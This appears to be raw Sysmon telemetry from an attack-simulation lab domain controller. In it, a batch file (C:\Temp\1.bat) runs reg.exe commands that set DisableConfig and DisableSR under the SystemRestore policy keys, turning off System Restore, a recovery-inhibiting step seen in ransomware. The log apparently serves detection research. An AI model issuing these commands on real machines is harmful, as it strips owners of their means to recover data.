12:04:38.740{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.740{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.754{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.740{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSRDWORD (0x00000001) 10341000x80000000000000009175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.740{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.740{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.745{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.724{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfigDWORD (0x00000001) 10341000x80000000000000009166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.724{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.724{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.724{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.724{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.724{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.731{266CAFBE-6556-6064-2701-00000000AE01}6264C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 10341000x80000000000000009158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.709{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.709{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.709{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.709{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.709{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
